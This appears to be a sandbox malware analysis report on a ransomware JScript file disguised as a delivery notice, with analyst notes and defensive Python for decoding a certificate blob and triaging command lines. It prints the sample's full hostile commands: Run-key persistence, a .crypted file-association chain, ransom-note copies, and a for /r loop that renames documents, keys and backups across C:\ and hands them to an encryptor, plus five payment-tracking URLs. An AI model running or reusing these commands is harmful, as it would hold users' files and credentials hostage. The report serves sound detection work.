Analysis
-
max time kernel: 146s
max time network: 148s
platform: windows7_x64
resource: win7v20201028
submitted: 15-01-2021 15:50
-
Static task: static1
Behavioral task: behavioral1
  Sample: Delivery_Notification_00896328.doc.js
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: Delivery_Notification_00896328.doc.js
  Resource: win10v20201028
General
-
Target: Delivery_Notification_00896328.doc.js
Size: 248KB
MD5: 0168089428c6aa371f4275d0872b0970
SHA1: d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e
SHA256: dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a
SHA512: 915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418
Malware Config
Extracted from C:\Users\Admin\AppData\Local\Temp\a.txt:
- 19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
Note: the extracted string has the form of a Bitcoin P2PKH address (34 base58 characters beginning with 1) and is reused as the a= parameter of all five URLs, which share the path /counter/ across five different hosts. Both the address and the five hosts are usable as indicators; the hosts carry the same query string, so a single URL-path rule (/counter/?a=) covers the set.
Signatures
-
Blocklisted process makes network request (7 IoCs)
Processes: wscript.exe
flow  pid  process
7     748  wscript.exe
8     748  wscript.exe
10    748  wscript.exe
12    748  wscript.exe
14    748  wscript.exe
15    748  wscript.exe
17    748  wscript.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
- Key created: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" (reg.exe)
Modifies registry class (7 IoCs)
Processes: reg.exe, reg.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" (reg.exe)
Modifies system certificate store (2 IoCs)
Processes: wscript.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (wscript.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 (wscript.exe)
Note: the key name is the SHA-1 thumbprint of the certificate, and the blob carries the UTF-16 friendly name "DST Root CA X3" and a DER certificate issued by "Digital Signature Trust Co." to that same name, i.e. the public DST Root CA X3 root. A well-known root appearing in the AuthRoot cache is what Windows does when it fetches a root during certificate-chain building, so on its own this signature does not show that the sample installed a certificate of its own. Treat it as a side effect of the network activity unless a certificate that is not a public root shows up under this key.
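To confirm what the Blob above actually contains, here is an added example (not the sandbox's code and not taken from the sample) that decodes the serialized certificate context Windows stores under AuthRoot\Certificates: it splits the property records, pulls the DER certificate (property 32), recomputes its SHA-1 against both the key name and the stored hash property, and reads the validity dates out of the DER. The property-ID names are the wincrypt.h CERT_*_PROP_ID constants; the blob is the one recorded in the signature, rejoined where the page broke the line.

```python
"""Decode the AuthRoot\\Certificates\\<thumbprint>\\Blob value recorded in the report.

Added example for this report (not the sandbox's or the sample's code). The blob is the hex
captured in the signature; property-ID names follow the wincrypt.h CERT_*_PROP_ID constants."""
import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 3        # SHA-1 of the encoded certificate
CERT_MD5_HASH_PROP_ID = 4         # MD5 of the encoded certificate
CERT_FRIENDLY_NAME_PROP_ID = 11   # UTF-16LE display name, NUL-terminated
CERT_CERT_PROP_ID = 32            # the DER-encoded certificate itself

REG_KEY_THUMBPRINT = "DAC9024F54D8F6DF94935FB1732638CA6AD77C13"  # key name from the report

BLOB_HEX = (  # value of ...\Certificates\DAC9...7C13\Blob as captured in the report
    "040000000100000010000000410352dc0ff7501b16f0028eba6f45c5"
    "0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d"
    "0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000"
    "090000000100000016000000301406082b0601050507030406082b06010505070301"
    "140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910"
    "1d00000001000000100000004558d512eecb27464920897de7b66053"
    "030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c13"
    "1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424"
    "20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b"
    "300d06092a864886f70d0101050500"
    "303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833"
    "301e170d3030303933303231313231395a170d3231303933303134303131355a"
    "303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833"
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100"
    "dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8c"
    "e5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f"
    "48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec"
    "1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d"
    "0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106"
    "301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910"
    "300d06092a864886f70d01010505000382010100"
    "a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db"
    "6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7"
    "167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc"
    "02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510"
)


def der_tlv(buf, off):
    """Parse one DER tag/length header at buf[off]; return (tag, value_start, value_end)."""
    tag, first = buf[off], buf[off + 1]
    off += 2
    if first & 0x80:                          # long form: low 7 bits = number of length bytes
        n = first & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    else:
        length = first
    return tag, off, off + length


def parse_cert_blob(blob):
    """Split a serialized certificate context into {prop_id: bytes}.

    Record layout, repeated to the end of the blob:
    DWORD prop_id | DWORD reserved (always 1) | DWORD length | length bytes of data."""
    props, off = {}, 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated property header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed property {prop_id} at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def cert_validity(cert):
    """Walk an X.509 DER certificate to Validity; return its UTCTime strings (notBefore, notAfter)."""
    _, off, _ = der_tlv(cert, 0)              # Certificate SEQUENCE
    _, off, _ = der_tlv(cert, off)            # tbsCertificate SEQUENCE
    tag, _, end = der_tlv(cert, off)
    if tag == 0xA0:                           # optional EXPLICIT [0] version (present in v3 certs)
        off = end
    for _ in range(3):                        # serialNumber, signature AlgorithmIdentifier, issuer
        _, _, off = der_tlv(cert, off)
    _, off, _ = der_tlv(cert, off)            # Validity SEQUENCE
    _, s, e = der_tlv(cert, off)
    not_before = cert[s:e].decode("ascii")
    _, s, e = der_tlv(cert, e)
    return not_before, cert[s:e].decode("ascii")


def analyse_blob(blob_hex, key_thumbprint):
    """Decode the blob and cross-check the embedded certificate against the key name and stored hashes."""
    props = parse_cert_blob(bytes.fromhex(blob_hex))
    cert = props[CERT_CERT_PROP_ID]
    sha1 = hashlib.sha1(cert).hexdigest()
    not_before, not_after = cert_validity(cert)
    return {
        "friendly_name": props[CERT_FRIENDLY_NAME_PROP_ID].decode("utf-16-le").rstrip("\x00"),
        "prop_ids": sorted(props),
        "cert_len": len(cert),
        "sha1": sha1,
        "sha1_matches_key_name": sha1.upper() == key_thumbprint.upper(),
        "sha1_matches_stored": sha1 == props[CERT_SHA1_HASH_PROP_ID].hex(),
        "md5_matches_stored": hashlib.md5(cert).hexdigest() == props[CERT_MD5_HASH_PROP_ID].hex(),
        "not_before": not_before,
        "not_after": not_after,
    }
```

Calling analyse_blob(BLOB_HEX, REG_KEY_THUMBPRINT) gives the friendly name "DST Root CA X3", the UTCTime strings 000930211219Z and 210930140115Z (the validity window of that root, 2000-09-30 to 2021-09-30), and the hash checks tie the DER certificate to the registry key name. The same decoder works on any value under SystemCertificates\*\Certificates\<thumbprint>\Blob, which is the check to run when a sandbox flags "Modifies system certificate store": a public root is noise, a private root or a certificate in the Root or Disallowed store is the finding.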
Suspicious use of WriteProcessMemory (27 IoCs)
Processes: wscript.exe, cmd.exe, cmd.exe, cmd.exe
pid   process      target pid  target process  entries
748   wscript.exe  540         cmd.exe         3
748   wscript.exe  328         cmd.exe         3
748   wscript.exe  1064        cmd.exe         3
748   wscript.exe  1032        cmd.exe         3
748   wscript.exe  576         cmd.exe         3
328   cmd.exe      1228        reg.exe         3
1064  cmd.exe      1624        reg.exe         3
748   wscript.exe  684         cmd.exe         3
540   cmd.exe      432         reg.exe         3
Note: every write is from a parent into a child it has just spawned (wscript.exe 748 into its six cmd.exe children, cmd.exe into its reg.exe child), which is the normal process-creation pattern rather than injection into an unrelated process. The PID pairs tie this flat signature to the process tree below: the three cmd.exe processes that spawned reg.exe (540, 328, 1064) are the REG ADD wrappers, and 1032, 576 and 684, which spawned no child, are the copy and for /r commands.
Processes
-
[1] C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js
    - Blocklisted process makes network request
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
            - Adds Run key to start application

    [2] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
            - Modifies registry class

    [2] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
            - Modifies registry class

    [2] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"

    [2] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" k6cdgj99hsftmhewo48hy6twl4xp299iukus)

    [2] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"

Notes on the tree:
- The sample is a JScript file with a ".doc.js" double extension. Explorer hides known extensions by default, so it displays as a Word document, but it is executed by wscript.exe.
- a.txt, the only dropped file the report lists under Downloads, is the ransom note: the Run value, the .crypted file association and both DECRYPT.txt copies point at it. Because a .txt is not executable, the Run entry is resolved through the file association, so notepad.exe opens the note at every logon; double-clicking any .crypted file does the same.
- The for /r loop walks all of C:\, renames each matching file to <name>.<ext>.crypted and then calls a0.exe on the renamed file with a fixed second argument. a0.exe does not appear among the files listed under Downloads, and the report records no file-encryption IoCs, so the page does not show whether that step ran. The pattern list covers archives, documents, media, source code, databases, backups and disk images, and also key and credential material (*.ssh, *.pub, *.gpg, *.pgp, *.kdb, *.kdbx).
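As an added example (not part of the report and not the sandbox's own signature logic), the following Python reads the cmd.exe command lines from the tree above and derives the behaviours an analyst would record from them: Run-key persistence pointing at a non-executable, the .crypted extension-to-handler chain, the ransom-note copies, and the for /r rename-and-call loop with its extension list and fixed argument. The command lines in COMMAND_LINES are copied from the tree; the regular expressions and the list of extensions treated as executable are this example's own assumptions.

```python
"""Triage the cmd.exe command lines from the report's process tree.

Added example for this page, not the sandbox's signature engine. COMMAND_LINES is copied
from the process tree; the regexes and EXECUTABLE_EXTS are this example's assumptions."""
import os
import re

COMMAND_LINES = [
    r'"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"',
    r'"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"',
    r'"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""',
    r'"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"',
    # the for /r loop, split over several literals only for readability
    r'"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip '
    r'*.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx '
    r'*.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi '
    r'*.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als '
    r'*.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class '
    r'*.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb '
    r'*.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr '
    r'*.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds '
    r'*.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg '
    r'*.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf '
    r'*.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav '
    r'*.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk '
    r'*.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" k6cdgj99hsftmhewo48hy6twl4xp299iukus)',
    r'"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"',
]

# Assumption: what a Run value normally points at; anything else is resolved via file association.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".msi", ".dll",
                   ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".lnk"}

REG_ADD_RE = re.compile(
    r'REG ADD\s+"(?P<key>[^"]+)"\s+(?:/V\s+"(?P<name>[^"]*)"|(?P<ve>/ve))\s+/t\s+(?P<type>\w+)'
    r'\s+(?:/F\s+)?/D\s+"(?P<data>(?:\\.|[^"\\])*)"', re.I)          # data may contain \" escapes
FOR_R_RE = re.compile(r'for /r\s+"(?P<root>[^"]*)"\s+%(?P<var>\w+)\s+in\s+\((?P<pats>[^)]*)\)'
                      r'\s+do\s+\((?P<body>.*)\)\s*$', re.I)
REN_RE = re.compile(r'REN\s+"%(\w+)"\s+"%~nx\1(?P<ext>\.\w+)"', re.I)   # REN "%i" "%~nxi.<ext>"
CALL_RE = re.compile(r'call\s+(?P<exe>\S+)\s+"(?P<arg>[^"]+)"\s+(?P<key>\S+)', re.I)
COPY_RE = re.compile(r'copy\s+/y\s+"(?P<src>[^"]+)"\s+"(?P<dst>[^"]+)"', re.I)


def parse_reg_add(cmdline):
    """Return {key, name, type, data} for a REG ADD command line, or None. name == '' means /ve."""
    m = REG_ADD_RE.search(cmdline)
    if not m:
        return None
    return {"key": m["key"], "name": m["name"] or "", "type": m["type"],
            "data": m["data"].replace('\\"', '"')}        # undo cmd-style \" escaping


def first_token(cmd):
    """First token of a command string, honouring a leading double-quoted path."""
    cmd = cmd.strip()
    return cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split()[0]


def triage(cmdlines):
    """Classify the command lines; returns human-readable findings plus the parsed data behind them."""
    findings, run_values, progid_for_ext, handler_for_progid = [], {}, {}, {}
    for r in filter(None, map(parse_reg_add, cmdlines)):
        key = r["key"].lower()
        if key.endswith(r"\currentversion\run"):
            run_values[r["name"]] = r["data"]
            ext = os.path.splitext(first_token(r["data"]))[1].lower()
            if ext not in EXECUTABLE_EXTS:
                findings.append(f"persistence: Run value '{r['name']}' points at a {ext} file, so the "
                                f"shell opens it with its associated handler at logon: {r['data']}")
        if (m := re.fullmatch(r"hkcr\\(\.\w+)", key)) and r["name"] == "":
            progid_for_ext[m[1]] = r["data"]                 # extension -> ProgID
        if (m := re.fullmatch(r"hkcr\\([^\\]+)\\shell\\open\\command", key)) and r["name"] == "":
            handler_for_progid[m[1].lower()] = r["data"]     # ProgID -> open command
    for ext, progid in progid_for_ext.items():
        if handler := handler_for_progid.get(progid.lower()):
            findings.append(f"file association: {ext} -> {progid} -> {handler}")
    loop = None
    for c in cmdlines:
        if m := FOR_R_RE.search(c):
            ren, call = REN_RE.search(m["body"]), CALL_RE.search(m["body"])
            loop = {"root": m["root"], "patterns": m["pats"].split(),
                    "appended_ext": ren["ext"] if ren else None,
                    "worker": call["exe"] if call else None,
                    "worker_arg": call["key"] if call else None}
            findings.append(f"mass rename: for /r over {loop['root']} with {len(loop['patterns'])} "
                            f"patterns, appending {loop['appended_ext']} and calling {loop['worker']}")
        elif (m := COPY_RE.search(c)) and m["dst"].lower().endswith("decrypt.txt"):
            findings.append(f"ransom note: {m['src']} copied to {m['dst']}")
    return {"findings": findings, "run_values": run_values, "associations": progid_for_ext,
            "handlers": handler_for_progid, "loop": loop}
```

triage(COMMAND_LINES) returns five findings in tree order (persistence, file association, the first note copy, the rename loop, the second note copy) together with the parsed Run value, the .crypted -> Crypted -> notepad.exe chain and the loop's 122 patterns, appended extension, worker binary and fixed argument. The same parser runs unchanged over cmd.exe command lines taken from Sysmon event ID 1 or a sandbox export, which is the point of keying detection on the REG ADD and for /r shapes rather than on the sample's hashes.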
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.txt
  MD5: 512ad548377714262b373c665f17d1db
  SHA1: 0f05efd559b90eb77418c32fa86cfcba77b6e187
  SHA256: 27966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca
  SHA512: f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943
-
Memory dumps:
- memory/328-4-0x0000000000000000-mapping.dmp
- memory/432-11-0x0000000000000000-mapping.dmp
- memory/540-3-0x0000000000000000-mapping.dmp
- memory/576-7-0x0000000000000000-mapping.dmp
- memory/684-10-0x0000000000000000-mapping.dmp
- memory/1032-6-0x0000000000000000-mapping.dmp
- memory/1064-5-0x0000000000000000-mapping.dmp
- memory/1228-8-0x0000000000000000-mapping.dmp
- memory/1436-2-0x000007FEF6350000-0x000007FEF65CA000-memory.dmp (Filesize: 2.5MB)
- memory/1624-9-0x0000000000000000-mapping.dmp